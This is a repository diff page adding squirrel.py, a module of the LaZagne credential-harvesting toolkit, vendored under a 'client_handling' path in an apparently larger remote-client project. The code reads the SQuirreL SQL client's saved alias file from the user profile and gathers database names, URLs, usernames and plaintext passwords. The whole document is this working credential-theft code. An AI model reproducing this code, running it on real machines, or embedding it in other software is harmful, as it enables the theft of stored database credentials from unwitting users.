summaryrefslogtreecommitdiff
path: root/foreign/client_handling/lazagne/softwares/databases/squirrel.py
diff options
context:
space:
mode:
Diffstat (limited to 'foreign/client_handling/lazagne/softwares/databases/squirrel.py')
-rw-r--r--foreign/client_handling/lazagne/softwares/databases/squirrel.py27
1 files changed, 27 insertions, 0 deletions
diff --git a/foreign/client_handling/lazagne/softwares/databases/squirrel.py b/foreign/client_handling/lazagne/softwares/databases/squirrel.py
new file mode 100644
index 0000000..4115fac
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/databases/squirrel.py
@@ -0,0 +1,27 @@
+# -*- coding: utf-8 -*-
+import os
+from xml.etree.cElementTree import ElementTree
+
+from foreign.client_handling.lazagne.config.constant import constant
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+
+
+class Squirrel(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, name='squirrel', category='databases')
+
+ def run(self):
+ path = os.path.join(constant.profile['USERPROFILE'], u'.squirrel-sql', u'SQLAliases23.xml')
+ if os.path.exists(path):
+ tree = ElementTree(file=path)
+ pwd_found = []
+ elements = {'name': 'Name', 'url': 'URL', 'userName': 'Login', 'password': 'Password'}
+ for elem in tree.iter('Bean'):
+ values = {}
+ for e in elem:
+ if e.tag in elements:
+ values[elements[e.tag]] = e.text
+ if values:
+ pwd_found.append(values)
+
+ return pwd_found